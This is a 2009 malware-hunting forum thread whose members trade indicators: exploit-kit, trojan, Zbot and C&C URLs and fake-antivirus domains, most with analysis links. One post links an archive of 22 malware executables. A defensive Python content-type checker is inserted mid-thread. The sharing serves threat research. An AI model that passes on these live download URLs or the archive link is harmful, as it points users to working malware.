firstgate.ru/33/cache/readme.pdf
firstgate.ru/33/load.php?id=0
firstgate.ru/33/load.php?id=4
firstgate.ru/33/t.php
gbvql.wwlax.com/get_frst.php?uid=3423165F-07C8-1033-0623-990000000001
gbvql.wwlax.com/gt_bd_93.php
gbvql.wwlax.com/gt_ky.php
globalstats.net/loads/goo.exe
globalstats.net/loads/instcash.exe
globalstats.net/yes/index.php
globalstats.net/yes/load.php
gogo2me.net/.dif/go.php?sid=1
gogo2me.net/.go/check.html
gogo2me.net/.lck/?1e0f7f566750932cf9b96399a3a313ab712552ca04c019d33f696298486535fb54f7049de7dc2d36eb11acb071200d262a7deba7573384091c4d7c8de7b5302c
gogo2me.net/.lck/?t=3
google-analistyc.net/in.cgi?5
gujjipuzzi.net/in.cgi?pipka2
gujjipuzzi.net/su/in.cgi?19
hansali4.com/731l2.exe
members.upc.pl/i.lemecha/index.gif
mystats.cn/?cid=streamb&code=strim
mystats.cn/000/cscpu2.php?t=img&cid=amazonka&n=1&mode=html
mystats.cn/000/cscpu2.php?t=img&cid=skype&n=1&mode=html
mystats.cn/000/cscpu2.php?t=img&cid=streamb&n=1&mode=html
mystats.cn/general/mzn/promo.jpg
mystats.cn/general/mzn/promobanner.php
mystats.cn/general/skype/promo.jpg
mystats.cn/general/skype/promobanner.php
mystats.cn/general/skype/skype.gif
mystats.cn/general/skype/stats.php
mystats.cn/streamb/hdtvauction/hdtv-banner.jpg
mystats.cn/streamb/hdtvauction/popup.php
mystats.cn/streamb/hdtvauction/ppc.php
nolagtime.com/gwc.txt
nolagtime.com/p33r/?v=19&aic=0&p=6150&su=0&fu=0
pakras.com/fky/3rkour.dat
pakras.com/fky/mp.dat
pakras.com/fky/zro.dat
pakras.com/iz98kbhg/404.php
pakras.com/iz98kbhg/flash.php
pakras.com/iz98kbhg/getexe.php?h=11
pakras.com/iz98kbhg/getexe.php?h=31
pakras.com/iz98kbhg/info.php
pakras.com/iz98kbhg/pdf.exp.php
pakras.com/oy5x552m/info.php
pakras.com/tn99y3w3/info.php
pakras.com/u57cwchq/info.php
porn-money.org/default.cgi
porn-money.org/in.cgi?2
reddii.ru/traffic/sploit1/?1850ytdbVddYad
reddii.ru/traffic/sploit1/?470ybVYadbtbt
reddii.ru/traffic/sploit1/getexe.php?h=11
reddii.ru/traffic/sploit1/getfile.php?f=swf
rifnasax.cn/in.cgi?2
rifnasax.cn/nuc/exe.php
rifnasax.cn/nuc/index.php
sexbases.cn/gr.php
sexbases.cn/in.cgi?15
sexbases.cn/in.cgi?20
sexbases.cn/vas.php
sexbases.cn/wed.html
teleporn.net/in/init.php
teleporn.net/stat/cache/flash.swf
teleporn.net/stat/cache/readme.pdf
teleporn.net/stat/index.php
teleporn.net/stat/load.php?id=0
teleporn.net/stat/load.php?id=4
thehugetitstop.cn/1/in.php
thehugetitstop.cn/1/load.php?id=1
thehugetitstop.cn/1/load.php?id=6
thehugetitstop.cn/1/pdf.php
thehugetitstop.cn/dontstop.html
thehugetitstop.cn/kadastr.html
thehugetitstop.cn/moon.html
topdaynews.eu/norad/robo.php?r=1
topdaynews.eu/norad/robo.php?r=4
topdaynews.eu/norad/robo.php?r=5
topdaynews.eu/norad/robo.php?r=6
topdaynews.eu/norad/tasks/US
tozxiqud.cn/in.cgi?2
tozxiqud.cn/nuc/exe.php
tozxiqud.cn/nuc/index.php
vpsspeedin.ru/1/in.php


Just some playing around stuff, nothing too serious.  ;)
Title: Re: daily something......
Post by: SysAdMini on March 24, 2009, 07:40:03 pm
Quote
Some of my dingleberries from last few weeks  :P

Just some playing around stuff, nothing too serious.  ;)

Looks like a long night for me.  ;) You did that on MWR some weeks ago. I had a lot of fun for a whole day.  :)
Title: Re: daily something......
Post by: sowhat-x on March 24, 2009, 08:26:53 pm
...Santa Claus is coming to town...

 ;D
Title: Re: daily something......
Post by: sowhat-x on March 24, 2009, 10:26:21 pm

Now let's see to whom supposedly "all of the bases are belong to...", heh... I say in return, 1 IP to rule them all:
http://www.bfk.de/bfk_dnslogger_en.html?query=87.242.78.57#result
Title: Re: daily something......
Post by: sowhat-x on March 24, 2009, 10:42:39 pm
CM_MWR brought me up in a good mood (as he usually does),
so I thought of sharing the joy with others as well...   ;)
http://www.google.com/search?hl=en&q=%22Index+of+%2F%22+mhstchk.php
Title: Re: daily something......
Post by: CM_MWR on March 25, 2009, 02:48:11 am
Has been a few moons, hasn't it.  ;D
Title: Re: daily something......
Post by: sowhat-x on March 25, 2009, 09:46:19 am
Open dir, these are the ones that caught my attention though...
Quote
hxxp://glush.by.ru/agang.jar
http://www.virustotal.com/analisis/b50e6d91d682919f664d1b412fe51e7b
Quote
hxxp://glush.by.ru/settlers.jar
http://www.virustotal.com/analisis/0d4e1b9b172ba3663b2d5aeb8b39d3d2
========================
Quote
hxxp://javacsript.net/index/in.cgi?5
http://wepawet.iseclab.org/view.php?hash=237b6aae1fd55cb5517943b187f43488&t=1237979819&type=js
--->
Quote
hxxp://newsantimalware.com/412/
hxxp://newsantimalware.com/412/iepdf.php?f=new
hxxp://newsantimalware.com/412/load.php
---> Result: 5/40 (12.50%) :
http://www.virustotal.com/analisis/38b38ade6b7d019c5d0aa2f7c6f937d7
========================
Quote
hxxp://ayurvedaservicesindia.we.bs
http://wepawet.iseclab.org/view.php?hash=9f43c950049303a60e3755f92a9f07d1&t=1237981067&type=js

Quote
hxxp://extraspray.com/in.php?
hxxp://agkt.info/evo/count.php?o=7
========================
Quote
hxxp://drmituayurvedatreatments.we.bs
http://wepawet.iseclab.org/view.php?hash=761f6eb37181b4c5221f4b98340e194d&t=1237981408&type=js

Quote
hxxp://ftp.shmurge.com/get.php?id='
hxxp://stat.zima07.ru
hxxp://get.zima07.ru/pdf.php?acc=1
hxxp://get.zima07.ru/swf.php
hxxp://ftp.zima07.ru/run.php
hxxp://get.load-flash.com/out.php?click

There might be more crap in the same IP, haven't checked that though...
http://www.bfk.de/bfk_dnslogger_en.html?query=66.40.56.10#result
Title: Re: daily something......
Post by: CkreM on March 25, 2009, 01:40:21 pm
av fraud:


Code: [Select]
goscanfull.com
redirect in the end to:
Code: [Select]
http://fusescan4.com/download/install.php
Code: [Select]
goscanplan.com
redirect in the end to:
Code: [Select]
http://wayscan4.com/download/install.php

This IP is full of AV fraud domains...

http://www.bfk.de/bfk_dnslogger_en.html?query=78.159.101.27#result
Title: Re: daily something......
Post by: sowhat-x on March 25, 2009, 07:06:26 pm
Quote
hxxp://ghthchinalimited.com.cn/admin/controller.php?action=bot&entity_list=
hxxp://turokgame.cn/bm/controller.php?action=bot&entity_list=

Quote
hxxp://attmyjoker.com/if/index.php
Title: Re: daily something......
Post by: CkreM on March 25, 2009, 10:17:05 pm
Waledac:
Code: [Select]
http://bestjournalguide.com/run.exe
http://urbanfear.com/run.exe
http://globalantiterror.com/run.exe

Redirects to exploits:
Code: [Select]
paintball2.by.ru
http://wepawet.iseclab.org/view.php?hash=8e522d049a6411492d6ddea2013a3c47&t=1238017604&type=js

Contain iframe of pdf exploit:
Code: [Select]
http://29ka.by.ru/
http://wepawet.iseclab.org/view.php?hash=5ba619da85a609ec2942b6e0417a728b&t=1238018761&type=js

the PDF exploit:
Code: [Select]
http://expresstv.co.il/un/pdf.php
http://wepawet.iseclab.org/view.php?hash=98a40fb7fd2a5a04cb12d788d2c4665c&t=1238018870&type=js

the trojan he downloads:
Code: [Select]
http://expresstv.co.il/un/load.php
http://www.virustotal.com/analisis/8f452239eb342ba3decd28a6ff241465

AV fraud:
Code: [Select]
vistastabilitynow.com
vistastabilitynow.net
scanalertspage.com
onlinescanservice.com
getscanonline.com
bestfiresfull.com
fuckmoneycash.com
bestfiresfull.com
yourstabilitysystem.com
popularpcscan.com
mostpopularscan.com
scanvistanow.net
Title: Re: daily something......
Post by: CM_MWR on March 26, 2009, 09:27:04 am
Quote
the trojan he downloads:

What happens if it's a transsexual piece of malware  ???   :D
Title: Re: daily something......
Post by: CkreM on March 26, 2009, 01:15:08 pm
Quote
the trojan he downloads:

What happens if it's a transsexual piece of malware  ???   :D

I will change it to "it" for all the feminists here :P
Title: Re: daily something......
Post by: CkreM on March 26, 2009, 01:29:34 pm
Redirect to exploits:
Code: [Select]
http://baltstroi-spb.by.ru
http://wepawet.iseclab.org/view.php?hash=d99f501d81c87b6e690fcd9147b6118e&t=1238072608&type=js

redirect to exploits:
Code: [Select]
http://hotjob.by.ru
http://wepawet.iseclab.org/view.php?hash=dd67f744942bd4dfb62ca592269c85f7&t=1238072560&type=js

exploits and Waledac Trojan in the end at:
Code: [Select]
http://dolpassgiven.ru/3/pdf.php
http://dolpassgiven.ru/3/load.php?id=3

http://www.virustotal.com/analisis/88095c3f38020917145ca045f5adbc60
http://anubis.iseclab.org/?action=result&task_id=120a06c16ed33fec4b9fb4b2a80db328e&format=html
Title: Re: daily something......
Post by: CkreM on March 26, 2009, 05:54:22 pm
Redirects to exploits:
Code: [Select]
http://vniic.by.ru
http://wepawet.iseclab.org/view.php?hash=8578df10b9d0f8b53bb43a7b193b68c4&t=1238083841&type=js

exploits/Trojan Waledac:
Code: [Select]
http://dasretokfin.com/include/spl.php
http://wepawet.iseclab.org/view.php?hash=d8ebd3a3d6bf7c41126a81b490f96294&t=1238084290&type=js
Code: [Select]
http://dasretokfin.com/load.php
http://www.virustotal.com/analisis/c91540f8abbf3f49e981edb486790a25
---------------------------------------------
Redirects to exploits:
Code: [Select]
http://rootastic.by.ru
http://wepawet.iseclab.org/view.php?hash=94d6673b07ddb8e91f85b0885415ab56&t=1238083887&type=js

Redirects to exploits:
Code: [Select]
http://gav-posad.by.ru
http://wepawet.iseclab.org/view.php?hash=a137e822fc9460ba0006c09b97c5483e&t=1238084673&type=js

Redirects to exploits:
Code: [Select]
http://fastfood.by.ru
http://wepawet.iseclab.org/view.php?hash=0f14d3e37ad232de59cd7b7b686486ae&t=1238085115&type=js

Redirects to exploits:
Code: [Select]
http://nemiroff.by.ru
http://wepawet.iseclab.org/view.php?hash=5a96bc55863a40a5cbc20e87fda449b7&t=1238087155&type=js

Redirects to exploits:
Code: [Select]
http://kkff.by.ru
http://wepawet.iseclab.org/view.php?hash=61bf7c4aae87094f6ff6d3b9b419f130&t=1238087090&type=js

Redirects to exploits:
Code: [Select]
http://amirag.by.ru
http://wepawet.iseclab.org/view.php?hash=67052be5d4655c2ee3aca176fde97b25&t=1238087608&type=js
Title: Re: daily something......
Post by: SysAdMini on March 26, 2009, 06:24:19 pm
Redirects to exploits:
Code: [Select]
http://vniic.by.ru
Code: [Select]
http://rootastic.by.ru
Code: [Select]
http://gav-posad.by.ru
Code: [Select]
http://fastfood.by.ru
Code: [Select]
http://nemiroff.by.ru
Code: [Select]
http://kkff.by.ru
Code: [Select]
http://amirag.by.ru

All of them are at the same host :

http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=87.242.78.57&colsearch=All&ascordesc=DESC&quantity=50&page=0

Who has time to check more domains from this IP?

http://www.bfk.de/bfk_dnslogger.html?query=87.242.78.57#result
Title: Re: daily something......
Post by: CkreM on March 26, 2009, 09:24:56 pm
Quote
Redirects to exploits:
Code: [Select]
http://vniic.by.ru
Code: [Select]
http://rootastic.by.ru
Code: [Select]
http://gav-posad.by.ru
Code: [Select]
http://fastfood.by.ru
Code: [Select]
http://nemiroff.by.ru
Code: [Select]
http://kkff.by.ru
Code: [Select]
http://amirag.by.ru

All of them are at the same host :

http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=87.242.78.57&colsearch=All&ascordesc=DESC&quantity=50&page=0

Who has time to check more domains from this IP?

http://www.bfk.de/bfk_dnslogger.html?query=87.242.78.57#result

That's what I've been doing in the last few days :)
Think I covered like 70% :P
Title: Re: daily something......
Post by: XiTri on March 27, 2009, 02:24:45 am
Code: [Select]
http://rifnasax.cn/nuc/index.php
http://rifnasax.cn/nuc/spl/pdf.pdf
http://rifnasax.cn/nuc/exe.php
may be offline
Code: [Select]
http://livestats.co.cc/script.js
Title: Re: daily something......
Post by: SysAdMini on March 28, 2009, 05:53:35 pm
Code: [Select]
http://krona98.biz/opi/
http://wepawet.cs.ucsb.edu/view.php?hash=03236ee924ddc9d03c2f11d176e3775c&t=1238262446&type=js

Code: [Select]
http://krona98.biz/opi/load.php?id=4
http://www.virustotal.com/analisis/0f51acface4b59ccc14b48cd92beaaac 1/39
VBA32    3.12.10.1    2009.03.27    Worm.Win32.AutoRun.oik
Title: Re: daily something......
Post by: XiTri on March 29, 2009, 06:54:46 am
Code: [Select]
http://ru98.biz/cgi-bin/wtsin.cgi?id=4
http://krona98.biz/ins/index.php
http://krona98.biz/myy/cache/readme.pdf
http://krona98.biz/myy/cache/flash.swf
http://krona98.biz/myy/load.php?id=4
http://krona98.biz/myy/load.php?id=5
Title: Re: daily something......
Post by: CkreM on March 30, 2009, 12:07:51 pm

rogue:

Code: [Select]
http://systemsecuritytool.com
http://system-tuner.net
http://getpcguard.com
http://systemsecurityonline.com

exploits+trojan:
Code: [Select]
http://blufda.com/
http://wepawet.iseclab.org/view.php?hash=9f5b70106e995d5f7a4e842f54cc3c29&t=1238414305&type=js
Title: Re: daily something......
Post by: CM_MWR on March 30, 2009, 06:48:57 pm
Title: Re: daily something......
Post by: CkreM on March 30, 2009, 10:22:27 pm
exploits/trojan:
Code: [Select]
pro100biz.cn/yes/index.php
http://wepawet.iseclab.org/view.php?hash=56cb05532164e0c797b9860ec0bd7f9b&t=1238446331&type=js

Title: Re: daily something......
Post by: GmG on March 31, 2009, 11:14:51 am
Code: [Select]
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe
Title: Re: daily something......
Post by: SysAdMini on March 31, 2009, 11:31:12 am
Quote
Code: [Select]
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe

already added some days ago.  ;)

http://www.malwaredomainlist.com/mdl.php?search=steer2.co.uk&colsearch=All&quantity=50
Title: Re: daily something......
Post by: GmG on March 31, 2009, 01:00:55 pm
Quote
Code: [Select]
http://steer2.co.uk/im/172.exe
http://steer2.co.uk/im/88.exe
http://steer2.co.uk/im/adv.exe
http://steer2.co.uk/im/avscan.exe
http://steer2.co.uk/im/podmena.exe

already added some days ago.  ;)

http://www.malwaredomainlist.com/mdl.php?search=steer2.co.uk&colsearch=All&quantity=50

Sorry  :'(

Rootkit TDSS
Code: [Select]
http://91.207.61.180/images/138/v3/file.exe

Code: [Select]
http://kxc-softwaresportal.com/promo.exe
http://updateserver.info/loads/traff.exe
http://updateserver.info/loads/instcash.exe
http://f-o-r.ms/xpre.tmp
http://f-o-r.ms/xrun.tmp

Mebroot
Code: [Select]
http://1681online.com/ld/dx/
http://wepawet.cs.ucsb.edu/view.php?hash=79ec6e02b38cad246c44c87dbeb4c2c6&t=1238508047&type=js

Rogue on googlecode like
http://sunbeltblog.blogspot.com/2009/03/google-code-site-used-as-malware.html

Code: [Select]
http://vlrm.googlecode.com/svn/trunk/
http://ultra-av.googlecode.com/svn/trunk/

Refpron
Code: [Select]
http://174.133.72.250/p1212/2.0/w.bin

Code: [Select]
http://mnnz.biz/ar/
http://mnnz.biz/ar/exe.php
Title: Re: daily something......
Post by: sowhat-x on March 31, 2009, 01:13:00 pm
f-o-r.ms -> seems we've got a jackpot here, heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result
Title: Re: daily something......
Post by: GmG on March 31, 2009, 01:14:48 pm
Quote
f-o-r.ms -> seems we've got a jackpot here, heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result

Malicious Advertising, xrun.exe - xpre.exe and friends
http://www.bluetack.co.uk/forums/index.php?showtopic=18462
 ;)
Title: Re: daily something......
Post by: sowhat-x on March 31, 2009, 01:25:46 pm
Lol, Bluetack is pretty much one of the best English-speaking malware-hunting forums out there,
but it doesn't really get the attention that it should from the security community, unfortunately...  :(
Title: Re: daily something......
Post by: SysAdMini on March 31, 2009, 02:01:44 pm
Quote
f-o-r.ms -> seems we've got a jackpot here, heh...
http://www.bfk.de/bfk_dnslogger.html?query=85.17.162.100#result

Malicious Advertising, xrun.exe - xpre.exe and friends
http://www.bluetack.co.uk/forums/index.php?showtopic=18462
 ;)

Ok, Marcel Heler and friends. Well known. ;)
Title: Re: daily something......
Post by: Mr Clean on March 31, 2009, 03:35:44 pm
Hi everyone, I'm a newbie here. Just want to say hi!

I really like this site and I'm embarrassed that I didn't start to appreciate it sooner.

Anyway, on a daily basis I run across all sorts of crazy stuff and I'm sure you do too. This bizarre little goodie just flashed on my screen so I thought I'd post it here to see what ya think.  ???

Code: [Select]
POST / HTTP/1.0
TagId: xxxxxxxxxxx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: search.namequery.com
Content-Length: 15
Pragma: no-cache
Via: 1.1 localhost:80 (squid)
Cache-Control: max-age=259200
Connection: keep-alive

~G.....p...o.\~HTTP/1.0 200 OK

Server: Microsoft-IIS/6.0
Content-Type: image/jpeg
Content-Length: 553
Connection: Close
TagId: xxxxxxxxxxx


~. ....MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

Any insight would be appreciated   :)

The binary is attached.
Title: Re: daily something......
Post by: sowhat-x on March 31, 2009, 04:10:30 pm
"binary3" unfortunately seems to be download-corrupted, i.e. it's not a valid executable...
Did you grab it via a POST request?
Title: Re: daily something......
Post by: Mr Clean on March 31, 2009, 04:21:20 pm
Quote
"binary3" unfortunately seems to be download-corrupted, i.e. it's not a valid executable...
Did you grab it via a POST request?

No, I pulled it from a pcap. Yeah, I noticed that it's broken. The squid proxy likely killed it. What I find bizarre is that it's a POST request, and the server responded by pushing down an apparent binary with a Content-Type: image/jpeg. This isn't exactly normal behaviour. Does anyone have anything on the domain "search.namequery.com"?
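A defender-side check for the two oddities raised in this exchange, written as an added example (not Mr Clean's code or tooling): it flags a response whose declared Content-Type disagrees with the body's magic bytes (image/jpeg carrying an MZ header), and tests whether an MZ body is a complete PE image or was cut short in transit. The sample response is constructed from the headers shown in the post; the leading proxy junk and the body bytes are made up.

```python
"""Flag HTTP responses whose declared Content-Type disagrees with the body's
magic bytes, and check whether an 'MZ' body is a complete PE image.
Added example; the sample responses below are constructed."""
from typing import Dict, Optional, Tuple

# Leading magic bytes -> the MIME type they really indicate (small constructed table).
MAGIC: Dict[bytes, str] = {
    b"MZ": "application/x-msdownload",
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF8": "image/gif",
    b"%PDF": "application/pdf",
}


def split_response(raw: bytes) -> Tuple[Dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into lower-cased headers and the body.

    Anything before the first 'HTTP/' (proxy framing, as in the capture) is skipped.
    """
    start = raw.find(b"HTTP/")
    if start < 0:
        raise ValueError("no HTTP status line found")
    raw = raw[start:]
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:  # tolerate bare-LF line endings
        head, _, body = raw.partition(b"\n\n")
    headers: Dict[str, str] = {}
    for line in head.splitlines()[1:]:  # skip the status line
        name, _, value = line.partition(b":")
        if name.strip():
            headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return headers, body


def sniff_type(body: bytes) -> Optional[str]:
    """Return the MIME type implied by the body's magic bytes, or None if unknown."""
    for magic, ctype in MAGIC.items():
        if body.startswith(magic):
            return ctype
    return None


def content_type_mismatch(raw: bytes) -> Optional[str]:
    """Describe a declared-vs-actual Content-Type mismatch, or None if consistent/unknown."""
    headers, body = split_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    actual = sniff_type(body)
    if actual is None or actual == declared:
        return None
    return f"declared {declared or '<none>'} but body looks like {actual}"


def pe_looks_complete(body: bytes) -> bool:
    """True if body is an MZ image whose e_lfanew points at a 'PE\\0\\0' signature.

    A download cut short by a proxy (as suspected in the thread) normally fails this.
    """
    if len(body) < 0x40 or not body.startswith(b"MZ"):
        return False
    e_lfanew = int.from_bytes(body[0x3C:0x40], "little")
    return body[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Constructed sample modelled on the headers in the capture: fake proxy junk before
# the status line, and a DOS stub body with no PE header behind it (truncated).
SAMPLE_TRUNCATED = (
    b"~G..junk..\x00HTTP/1.0 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"Content-Type: image/jpeg\r\n"
    b"Content-Length: 553\r\n"
    b"Connection: Close\r\n"
    b"TagId: xxxxxxxxxxx\r\n"
    b"\r\n"
    b"MZ\x90\x00" + b"\x00" * 0x3C + b"This program cannot be run in DOS mode."
)

# Same mismatch, but a minimal MZ header whose e_lfanew (0x40) lands on 'PE\0\0'.
SAMPLE_COMPLETE_PE = (
    b"HTTP/1.0 200 OK\r\nContent-Type: image/jpeg\r\n\r\n"
    b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 16
)


if __name__ == "__main__":
    for name, sample in (("truncated", SAMPLE_TRUNCATED), ("complete", SAMPLE_COMPLETE_PE)):
        _, body = split_response(sample)
        print(name, "->", content_type_mismatch(sample), "| PE complete:", pe_looks_complete(body))
```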
Title: Re: daily something......
Post by: sowhat-x on March 31, 2009, 04:36:03 pm
Google returns a few bad history records from what it seems...
http://www.bfk.de/bfk_dnslogger.html?query=209.53.113.223#result
http://www.google.com/search?q=209.53.113.223
Title: Re: daily something......
Post by: Mr Clean on March 31, 2009, 04:52:02 pm
Quote
Google returns a few bad history records from what it seems...
http://www.bfk.de/bfk_dnslogger.html?query=209.53.113.223#result
http://www.google.com/search?q=209.53.113.223

Ok, this is generated by a program called "computrace" by Absolute Software. It's laptop "lojack" software.
Title: Re: daily something......
Post by: CkreM on March 31, 2009, 05:08:56 pm
Zbot, domain on MDL but different path this time:

Code: [Select]
http://amnepofig.ru/test/config.bin
http://amnepofig.ru/test/loader.exe
Title: Re: daily something......
Post by: sowhat-x on April 01, 2009, 12:53:45 am
Quote
hxxp://bublik.biz/in.cgi?2 // Newer domain hosted over at 88.198.48.247...

Redirects to ->
Quote
hxxp://cximnik.cn/img2/index.php // Already spotted in previous days...pdf exploits etc.
= = = = = = = = = = = = = = = = =

Quote
hxxp://basesrv3.net/update/main.exe
Result: 9/40 (22.5%):
http://www.virustotal.com/analisis/bc75d1265dcad80564f03cfb3cc1e1ae
Title: Re: daily something......
Post by: CkreM on April 01, 2009, 12:07:46 pm
Exploit/Trojan:
Code: [Select]
murka-best.com/include/spl.php
http://wepawet.iseclab.org/view.php?hash=f6e9a5645ca288e481b17453d05491d0&t=1238524847&type=js

Trojan:
Code: [Select]
luks5.cn/unique/1.exe
http://www.virustotal.com/analisis/9cec63d35bafded6092bee37132e6e0a
Title: Re: daily something......
Post by: sowhat-x on April 01, 2009, 12:14:47 pm
Code: [Select]
hxxp://213.155.6.33/new/controller.php?action=bot&entity_list=
One more C&C server in the same netblock, 213.155.6.32 already spotted a couple of days ago...

Code: [Select]
hxxp://213.155.4.82/new/controller.php?action=bot&entity_list=
C&C server, 213.155.4.80 also spotted earlier in the same netblock...

For sparsha - as I know he has a special preference in fake AVs...  :)
Code: [Select]
hxxp://pornorawa.com
hxxp://sys-scan-1.biz
hxxp://sys-scanner-1.biz/download.php?page=
hxxp://www.system-protector.net/

Few more fake AVs...
Code: [Select]
hxxp://pcsolutionshelp.com/
hxxp://download.pcsolutionshelp.com/secure/fb4b4716a45f37c3694efcab0d41ee69/49d376e5/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
hxxp://malwareremovingtool.com/
hxxp://download.malwareremovingtool.com/secure/ab3dc06cc30452c69f2a70caf88d36bb/49d376e5/AntiMalwareGF_Rezer.exe

Code: [Select]
hxxp://download.malwareremovingtool.com/  -> Open dir...have fun ;-)
Title: Re: daily something......
Post by: sowhat-x on April 01, 2009, 04:21:38 pm
http://www.megaupload.com/?d=8L92M1AS
Just in case they take notice of it quickly and fix the directory read permissions,
I've archived the contents of download.malwareremovingtool.com:
58 MB archive containing 22 executables, no password needed...
Title: Re: daily something......
Post by: CkreM on April 01, 2009, 04:30:54 pm
Exploits/trojan
Code: [Select]
http://megabot.cn/index.php
http://wepawet.iseclab.org/view.php?hash=a95957a8b26780652b9900b284787dbc&t=1238602058&type=js

Redirects to exploits:
Code: [Select]
http://loskut.cn/cotton.html
http://wepawet.iseclab.org/view.php?hash=286bf4c04744e908b56a31102a09ac69&t=1238590602&type=js
Code: [Select]
http://ufomany.by.ru
http://wepawet.iseclab.org/view.php?hash=fdb7fd5376b78cb765a7c9611b9bd053&t=1238595797&type=js

Zbot:
Code: [Select]
http://211.95.79.114/load/ldr.exe
http://www.virustotal.com/analisis/3800cd2ec6b09e059fcbe102d7e54b39
Title: Re: daily something......
Post by: CM_MWR on April 01, 2009, 06:00:28 pm
List I was working on before I had my memory loss.  ???

I think many are gone bye bye now.  :-\
Title: Re: daily something......
Post by: CkreM on April 01, 2009, 08:26:27 pm
Zbot:

Code: [Select]
http://ctuf.info/ldr.exe
http://ctuf.info/cfg.bin
http://zeus-logs.biz/ldr.exe
http://zeus-logs.biz/cfg.bin
Title: Re: daily something......
Post by: SysAdMini on April 02, 2009, 08:23:06 pm
Code: [Select]
paksusic.cn/nuc/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=54bef4b232fec015b149b37a0c11fb9a&t=1238703827&type=js
http://www.virustotal.com/analisis/5566b16433e8c935625315dd76f619bf
Title: Re: daily something......
Post by: CkreM on April 02, 2009, 10:21:11 pm
Exploit which leads to trojan on MDL already:
Code: [Select]
http://dnsmytruedns.com/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=a6ddc93d17f80b8200c9dffa41b5a3a0&t=1238704964&type=js

Other trojan there:
Code: [Select]
http://dnsmytruedns.com/nuc/exe.php
http://www.virustotal.com/analisis/20fbf18e0a83f244a8a9a9a68068db80

Redirect to exploits:
Code: [Select]
http://aaaimmigration.com/
http://wepawet.iseclab.org/view.php?hash=7cb8f06a3c45746da10f644b71027a98&t=1238706643&type=js

Exploits/trojan:
Code: [Select]
http://p0rn-movies.com/77/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=a2982470cd2fbee7be138128ef6e8d0d&t=1238707074&type=js

Trojan:
Code: [Select]
http://findwife.asia/unique/1.exe
http://www.virustotal.com/analisis/6eae1c969cc3e7aae2f7ae0982be3bef

Exploit/Trojan:
Code: [Select]
http://193.200.255.19/~timchenko/cms/index.php
http://wepawet.iseclab.org/view.php?hash=832a4879ab612a34ba0c854471d72747&t=1238714177&type=js

Redirect to fake Av:
Code: [Select]
http://kogerta.com/redirect/bucks.php
fake AV :
Code: [Select]
system-scan-1.biz
Exploit/trojan:
Code: [Select]
http://hostyapics.net/img/index.php
http://wepawet.iseclab.org/view.php?hash=9e754a227c062120b20e7864e1e4ed59&t=1238720525&type=js
Title: Re: daily something......
Post by: GmG on April 03, 2009, 02:54:47 pm
Koobface

Code: [Select]
http://xviewworldmy1.com/download/1/1000/5
http://viewworldmy1.com/download/1/1000/5
Title: Re: daily something......
Post by: SysAdMini on April 03, 2009, 06:39:02 pm
exploits/trojan
Code: [Select]
www.homesy.net/zel/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=e5e78672b3f7a7e8c52cda045bd24bf1&t=1238782592&type=js
http://www.virustotal.com/analisis/445d8300ab224462d9a00448318abe1a
Title: Re: daily something......
Post by: SysAdMini on April 04, 2009, 06:46:25 am
exploits/trojan
Code: [Select]
ispacemac.ru/1/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=049acfef69985d06934cb5d5e5098311&t=1238827604&type=js
http://www.virustotal.com/analisis/13954a7dd49b63eca41859e756b0e0a5

exploits/trojan
Code: [Select]
2icqmag.ru/mix/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=f1fb4e76dc9849b5a935d5b0d7c65553&t=1238827889&type=js
http://www.virustotal.com/analisis/a766c088385f0b406438e4051e821731
Title: Re: daily something......
Post by: SysAdMini on April 05, 2009, 05:02:56 pm
Fake AVs

Those were reported by Steven as located at zlkon, but they have since been moved to IP 64.191.12.38.
Code: [Select]
antispylinks.com
antispyme.com
antispywareup.com
antiviruscheckout.com
antivirusup.com
goldpcguard.com
pcsecuretools.com

Reported by Anthony
Code: [Select]
78.26.179.131

best-tube-home.com

78.26.179.137

files.ms-loads-av.com/exe/setup_1_2_1.exe

66.197.154.198

goscanside.com
scan6zoom.com
scan6safe.com
userscan6.com
litescan6.com

209.44.126.14

fastsecurityscan.com
thegreatsecurity.com
truescansecurity.com
topsoftscanner.com/download.php
topsoftscanner.com/install/ws.zip

213.163.65.10

iloveyourbrain.com/scan/
loyal-tube.com/codec.exe
loyaldown99.com/codec.exe
loyaltube09.com/codec.exe
rakompoporyadkunazaryadku.com/codec.exe
ruler-domains.com/codec.exe
setupdatdownload.com/codec.exe
tube-loyal.com/codec.exe
tubeloyal.com/codec.exe
tubeloyaln.com/codec.exe
billingpayment.netcodecs.tubeloyaln.com/codec.exe
lamer.tubeloyaln.com/codec.exe
videosz.tubeloyaln.com/codec.exe
wedare.tubeloyaln.com/codec.exe
velzevuladmin.com/codec.exe
winpcdown09.com/codec.exe
winpcdown99.com/codec.exe
xp-police-09.com/codec.exe
xp-police-2009.com/codec.exe
xp-police-antivirus.com/codec.exe
xp-police-av.com/codec.exe
xp-police-engine.com/codec.exe
xp-police.com/codec.exe
*.xp-police.com/codec.exe

92.38.0.41

wincodecupdate.com/codec.exe

94.76.213.227

antispywareproupdates.com/zsa360/winconfig.dll

78.46.216.233

